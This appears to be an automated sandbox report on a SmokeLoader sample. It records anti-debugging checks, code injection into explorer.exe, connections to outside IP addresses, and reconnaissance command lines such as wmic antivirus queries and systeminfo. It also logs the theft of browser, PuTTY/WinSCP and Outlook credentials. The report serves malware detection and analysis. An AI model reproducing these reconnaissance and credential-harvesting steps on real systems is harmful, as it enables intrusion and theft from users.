Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fo & echo 1315569602311345261315569602\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71431-70569-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 25/09/2023, 10:34:23\r\nSystem Manufacturer: 9exC3KV3FNmpHlL\r\nSystem Model: wmU5t6Us\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: AMUTX H8F5D, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'913 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'163 MB\r\nVirtual Memory: In Use: 1'028 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: cKXTB\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.8\r\n [02]: fe80::9405:b556:3adf:1ab3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1315569602311345261315569602\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp> Section . . . . . . . : Answer\r\n A (Host) Record . . . : 190.249.193.233\r\n\r\n\r\n Record Name . . . . . : nwgrus.ru\r\n Record Type . . . . . : 1\r\n Time To Live . . . . : 1\r\n Data Length . . . . . : 4\r\n Section . . . . . . . : Answer\r\n A (Host) Record . . . : 189.163.45.204\r\n\r\n\r\n1250100858311345261250100858\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>AYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVenzOODTFtCXukOkIK\SwOkIPcPPAU.exe" ,C:\Program Files (x86)\OFtAYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVen
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: F1A1.tmp.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: F1A1.tmp.11.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F1A1.tmp.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000002.3874615260.000001B605D33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: F1A1.tmp.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: ROUTE.EXE, 00000026.00000002.3222174402.000002608D199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: F1A1.tmp.11.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: F1A1.tmp.11.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: explorer.exe, 0000000B.00000003.2411772678.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs - EU East & CentralVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: F1A1.tmp.11.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: F1A1.tmp.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\AppData\Roaming\hehcrfb	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\fihcrfb	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00C21B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,

14_2_00C21B17

Source: C:\Users\user\AppData\Roaming\hehcrfb

Code function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

33_2_00401000

Source: C:\Windows\SysWOW64\explorer.exe

14_2_00C21016

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF780B678EC

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00792017 push dword ptr fs:[00000030h]	0_2_00792017
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0216092B mov eax, dword ptr fs:[00000030h]	0_2_0216092B
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_02160D90 mov eax, dword ptr fs:[00000030h]	0_2_02160D90
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F092B mov eax, dword ptr fs:[00000030h]	4_2_005F092B
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F0D90 mov eax, dword ptr fs:[00000030h]	4_2_005F0D90
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006410AF push dword ptr fs:[00000030h]	4_2_006410AF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006CFE2B push dword ptr fs:[00000030h]	7_2_006CFE2B
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0216092B mov eax, dword ptr fs:[00000030h]	7_2_0216092B
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02160D90 mov eax, dword ptr fs:[00000030h]	7_2_02160D90
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_006C092B mov eax, dword ptr fs:[00000030h]	8_2_006C092B
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_006C0D90 mov eax, dword ptr fs:[00000030h]	8_2_006C0D90
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00710113 push dword ptr fs:[00000030h]	8_2_00710113

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B62654 GetProcessHeap,RtlReAllocateHeap,

9_2_00007FF780B62654

Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00401000
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00403EE2
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00408D0A
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004047EE SetUnhandledExceptionFilter,	33_2_004047EE
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00401000
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00403EE2
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00408D0A
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004047EE SetUnhandledExceptionFilter,	34_2_004047EE

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 354F.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.121.204.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.228.112.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Thread created: C:\Windows\explorer.exe EIP: A6F19A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Thread created: unknown EIP: 7FC19A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Thread created: unknown EIP: 2CE1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Thread created: unknown EIP: 87F1970	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 1012 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 5268 base: 7FF62D872D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1996 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7144 base: 7FF62D872D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 6784 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7252 base: 7FF62D872D10 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		16_2_00AD10A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		16_2_00AD1016

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv

Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1504842571.00000000044D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C855EB cpuid

11_2_00C855EB

Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: GetLocaleInfoA,		33_2_00408EA0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: GetLocaleInfoA,		34_2_00408EA0

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Code function: 0_2_00418C80 InterlockedCompareExchange,SetFocus,ReadConsoleA,FindAtomW,SearchPathA,GetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExA,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameW,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmA,WaitForSingleObject,SetCommMask,GetUserObjectInformationW,GetConsoleAliasesLengthA,GetComputerNameW,GetConsoleAliasExesLengthW,GetBinaryType,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,

0_2_00418C80

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C32198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

11_2_00C32198

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543198734.000001B605D13000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543460011.000001B605D1A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
